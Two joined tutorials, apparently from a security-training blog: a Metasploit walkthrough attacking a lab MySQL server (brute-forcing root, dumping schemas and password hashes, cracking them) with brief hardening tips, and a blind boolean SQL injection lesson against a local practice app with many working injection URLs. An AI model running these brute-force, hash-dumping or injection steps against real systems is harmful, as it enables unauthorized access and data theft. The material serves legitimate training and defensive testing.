Penetration Testing on MYSQL (Port 3306)

Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In our previous article we had already discussed how to configure of mysql in ubuntu which you can read from here, now moving towards for its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MYSQL

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306. 

nmap -sT 192.168.1.216

If service is activated in targeted server then nmap show open STATE for port 3306.

Enumerating MYSQL Banner

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for MYSQL version.

use auxiliary/scanner/mysql /mysql _version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.

MYSQL Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Stealing MYSQL information 

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From given image you can observe that it has executed the sql query for dumping the name of databases.

Extracting MYSQL Schema Information

This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) >set username root

msf auxiliary(mysql_schemadump) >set password toor

msf auxiliary(mysql_schemadump) >run

here it has dump the information schema for database “ignite” with table name “student” , 5 columns name with column types:

DB: ignite

Table name: student

Last Name

(varchar 30)

First Name

(varchar 30)

Student ID

(int 11)

Major

(varchar 20)

Dorm

(varchar 20)

Check File Privileges

Open my.cnf file to verify file privileges using following command:

gedit /etc/mysql/my.cnf

Here you can see given below statements are uncommented

  • Mysqld_safe
  • Mysqld
  • Secure_file _priv

If these statements are uncommented then it becomes very easy for attacker to perform file enumeration.

Mysql File Eumeration

This module will enumerate files and directories using the MySQL load_file feature.

Use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_ file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_ file_enum) > set username root

msf auxiliary(mysql_ file_enum) > set password toor

msf auxiliary(mysql_ file_enum) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_ file_enum) > run

Here it will start identifying whether the given files list is exist in the target system or not.

From given image you can observe that it has found /etc, /var, /var/www such directory exists.

Enumerate MYSQL writeable directories

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we had assign a list of files so that we can identify the writable directory and from given image you can observe that it has found writable permission only for /tmp.

Mysql User Enumeration

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It will start retrieving information such as list of other user account and user privileges on mysql server.

From given image it will be clear to you, that it has shown list of account with hash password and list of user who have GRANT privileges.

As you can see other than user root it has some more user such as sr with hash password, here you can crack this password using password cracker tool.

Extract MYSQL Username with Hash Password

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set toor

msf auxiliary(mysql_hashdump) > run

Now from screenshot you can see the hash value of password is given for all users. Metasploit store these hash value inside /tmp folder and later use john the ripper for cracking password.

Crack Hash Password with John the Ripper

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mysql_fast

msf auxiliary(jtr_mysql_fast) >options

msf auxiliary(jtr_mysql_fast) >run

By default it will use metasploit wordlist where hash value has been saved and start cracking hash value.

If you notice the given below image you can perceive that it has successfully crack the double SHA-1 hashing and decrypt the password into plain text.

Now using above retrieved credential you can try to login into mysql server.

Here you can see we had successfully login into server. Hence attacker can easily breach the security of server and steal the important information or modify it.

Secure MYSQL through port forwarding

In order to secure mysql server admin can forward port from default to specific port to run the service. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Now change port 3306 into any other port such as 3000 as shown in given image and save the changes and restart the service.

service mysql restart

Verify it using nmap command as given below:

nmap -sT 192.168.1.216

Prevent Mysql against brute force attack

In order to secure mysql server admin can bind the service to its localhost. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Only you need to enable bind-address by making it uncomment  as shown in given images.

service mysql rstart

Now let’s verify it by making brute force attack same as above using dictionary.

Great!! Attacker is not able to connect the server which resists brute force attack also as shown in given image.

Admin should GRANT all privilege to a specific user only with specific IP address which prevents database information alteration from attackers.

Now for granting all privileges; login into mysql server and type following query:

mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’ WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation

mysql > flush privileges;

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

Beginner Guide to SQL Injection Boolean Based (Part 2)

Their so many ways to hack the database using SQL injection as we had seen in our previous tutorial Error based attack, login formed based attack and many more different type of attack in order to retrieve information from inside database. In same way today we will learn a new type of SQL injection attack known as Blind Boolean based attack.

An attacker always check SQL injection vulnerability using comma () inside URL  to break the statement in order to receive sql error message. It is a fight between developer and attacker, the developer increases the security level and attacker try to break it. This time developer had blocked error message as the output on the website. Hence if database is vulnerable to SQL injection then attacker do not obtain any error message on website.Attacker will try to confirm if the database is vulnerable to Blind SQL Injection by evaluating the results of various queries which return either TRUE or FLASE.

 Let’s start!!

Using Dhakkan we will demonstrate blind SQL injection.

Lesson 8

Lesson 8 is regarding blind boolean based injection therefore first we need to explore http://localhost:81/sqli/Less-8/?id=1 on browser, this will send the query into database.

SELECT * from table_name WHERE id=1

As output it will display “you are in” the yellow colour text on the web page as shown in given image.

When attacker tries to break this query using comma () http://localhost:81/sqli/Less-8/?id=1’

 Or other different technique he will not able to found any error message. More over yellow colour text will disappear if attack tries to inject invalid query which also shown in given image.

Then attacker will go for blind sql injection to make sure, that inject query must return an answer either true or false.

http://localhost:81/sqli/Less-8/?id=1′ AND 1=1 –+

SELECT * from table_name WHERE id=1’ AND 1=1

Now database test for given condition whether 1 is equal to 1 if query is valid it returns TRUE, from screenshot you can see we have got yellow colour text again “you are in”, which means our query is valid.

In next query which check for URL

http://localhost:81/sqli/Less-8/?id=1′ AND 1=0 –+

SELECT * from table_name WHERE id=1’ AND 1=0

Now it will test the given condition whether 1 is equal to 0 as we know 1 is not equal to 0 hence database answer as ‘FLASE’ query. From screenshot it confirms when yellow colour text get disappear again.

Hence it confirms that the web application is infected to blind sql injection. Using true and false condition we are going to retrieve database information.

Length of database string

Following query will ask the length of database string. For example the name of database is IGNITE which contains 6 alphabets so length of string for database IGNITE is equal to 6.

Similarly we will inject given below query which will ask whether length of database string is equal to 1, in response of that query it will answer by returning TRUE or FALSE through text “you are in”.

http://localhost:81/sqli/Less-8/?id=1′ AND (length(database())) = 1 –+

From given screenshot you can see again the text gets disappear which means it has return FALSE to reply NO the length of database string is not equal to 1

http://localhost:81/sqli/Less-8/?id=1′ AND (length(database())) = 2 –+

Again it will test the length of database string is equal to 2; it has return FALSE to reply NO the length of database string is not equal to 2. Repeat the same step till we do not receive TRUE for string length 3/4/5/ and so on.

http://localhost:81/sqli/Less-8/?id=1′ AND (length(database())) = 8 –+

when I test for string is equal to 8; it answer as true and as result yellow colour text “you are in” appears again.

As we know computer does not understand human language it can read only binary language therefore we will use ASCII code. The ASCII code associates an integer value for all symbols in the character set, such as letters, digits, punctuation marks, special characters, and control characters.

For example look at following string ascii code:

1 = I = 73

2 = G = 71

3 = N = 78

4 = I = 73

5 = T = 84

6 = E = 69

Image Source:lookuptable.com

Further we will enumerate database name using ascii character for all 8 strings.

Next query will ask from database test the condition whether first string of database name is greater than 100 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select database()),1,1))) > 100 –+

It reflects TRUE condition hence if you match the ascii character you will observe that from 100 small alphabets string has been running till 172.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select database()),1,1))) > 120 –+

Similarly it will test again whether first letter is greater than 120. But this time it return FALSE which means the first letter is greater than 100 and less than 120.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select database()),1,1))) > 101 –+

Now next it will equate first string from 101, again we got FALSE.

We  had perform this test from 101 till 114 but receive FALSE every time.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select database()),1,1))) > 114–+

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select database()),1,1))) = 115–+

Finally receive TRUE reply at 115 which means first string is equal to 115, where 115 =‘s’

Similarly test for second string, repeat above step by replacing first string from second.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select database()),2,1))) > 100 –+

I received TRUE reply at 101 which means second string is equal to 101 and 101 = ‘e’.

Similarly I had performed this for all eight strings and got following result:

Given query will test the condition whether the length of string for first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1′ AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 –+

In reply we receive TRUE and text “you are in” appears again on the web site.

Similarly I test for second and third table using same technique by replacing only table number in same query.

1 = s = 115

2 = e = 101

3 = c =99

4 = u =117

5 = r =114

6 = i = 105

7 = t = 116

8 = y = 121

Table string length

We have to use same technique for enumerating information of the table from inside the database. Given query will test the condition whether the length of string for first table is greater than 5 or not.

http://localhost:81/sqli/Less-8/?id=1′ AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 5 –+

In reply we receive TRUE and text “you are in” appears again on the web site.

Given query will test the condition whether the length of string for first table is greater than 6 or not.

http://localhost:81/sqli/Less-8/?id=1′ AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 6 –+

In reply we receive FALSE and text “you are in” disappears again from the web site.

Given query will test the condition whether the length of string for first table is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1′ AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 –+

In reply we receive TRUE and text “you are in” appears again on the web site.

Similarly I test for second and third table using same technique by replacing only table number in same query.

Similarly enumerating fourth table information using following query to test the condition whether the length of string for fourth table is equal to 5 or not.

http://localhost:81/sqli/Less-8/?id=1′ AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 –+

In reply we receive TRUE and text “you are in” appears again on the web site.

As we had performed in database enumeration using ascii code similarly we are going to use same technique to retrieve table name.

Further we will enumerate 4th table name using ascii character for all 5 strings.

Next query will ask from database to test the condition whether first string of table name is greater than 115 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 115 –+

It reflects TRUE condition text “you are in” appears again on the web site hence if you match the ascii character.

Next query will ask from database to test the condition whether first string of table name is greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) > 120 –+

But this time it return FALSE which means the first letter is greater than 115 and less than 120.

Proceeding towards equating the string from ascii code between number 115 to 120. Next query will ask from database to test the condition whether first string of table name is greater than 120 using acsii substring.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 116 –+

It return FALSE, text get disappear.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 –+

It returns TRUE, text get appear.

Similarly we had test remaining strings and received following result

1 = u = 117

2 = s = 115

3 = e = 101

4 = r = 114

5 = s = 115

User Name Enumeration

Using same method we are going to enumerate length of string username from inside the table users

Given below query will test for string length is equal to 4 or not.

http://localhost:81/sqli/Less-8/?id=1′ AND (length((select username from users limit 0,1))) = 4 –+

 It reply TRUE with help of yellow color text

 Using same method we are going to enumerate username from inside the table users

Given below query will test for first string using ascii code.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 100 –+

 We received FALSE which means the first string must be less than 100.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 50 –+

 We received TRUE which means the first string must be more than 50.

Similarly,

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 60 –+

 We received TRUE which means the first string must be more than 60.

Similarly,

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 70 –+

 We received FALSE which means the first string is less than 70.

Hence first string must lie between 60 and 70 of ascii code.

Proceeding towards comparing string from different ascii code using following query.

http://localhost:81/sqli/Less-8/?id=1′ AND (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 –+

This time successfully receive TRUE with appearing text “you are in”.

Similarly I had test for all four string in order to retrieve username:

1 = D = 68

2 = u = 117

3 = m = 109

4 = b = 98

Hence today we had learned how attacker hacked database using blind sql injection.

!!Try yourself to retrieve password for user dumb!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...